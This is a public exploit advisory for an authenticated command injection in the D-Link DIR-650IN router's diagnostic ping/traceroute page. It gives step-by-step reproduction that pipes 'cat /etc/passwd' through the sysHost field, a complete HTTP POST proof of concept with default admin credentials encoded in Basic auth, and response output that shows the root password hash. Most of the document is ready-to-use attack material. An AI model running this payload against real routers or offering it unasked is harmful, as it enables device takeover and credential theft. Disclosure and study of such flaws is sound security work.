D-Link DIR-650IN - Authenticated Command Injection

# Exploit Title: D-Link DIR-650IN - Authenticated Command Injection
# Date: 2023-01-08
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.dlink.com
# Software Link: https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09
# Version: Firmware V1.04 (REQUIRED)
# Tested on: DIR-650IN Web UI (Boa/0.94.14rc21), Windows 10 / Chrome 108
# CVE: N/A (Version included now, previously missing)

Description:
The D-Link DIR-650IN Wireless N300 Router is vulnerable to an Authenticated Command Injection vulnerability in the Diagnostic (Ping / Traceroute) functionality.

The parameter sysHost is not sanitized, allowing an authenticated attacker (even with low-privilege access) to inject OS commands. Exploitation leads to full compromise of the router, including reading sensitive system files such as /etc/passwd.

Steps to Reproduce:
1. Log in to the router web interface.
2. Go to Management → Diagnostic.
3. Select Ping or Traceroute.
4. Enter: google.com | cat /etc/passwd
5. Click Apply.
6. Output includes /etc/passwd contents.

HTTP PoC:
POST /boafrm/formSysCmd HTTP/1.1
Host: 192.168.0.1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded

submit-url=%2Fsyscmd.htm&sysCmd=ping&sysCmdType=ping&checkNum=5&sysHost=google.com%7Ccat%20/etc/passwd&apply=Apply

Response Extract:
root:XEOFcsRJLyXbQ:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/:/dev/null

References:
https://www.dlink.com
https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09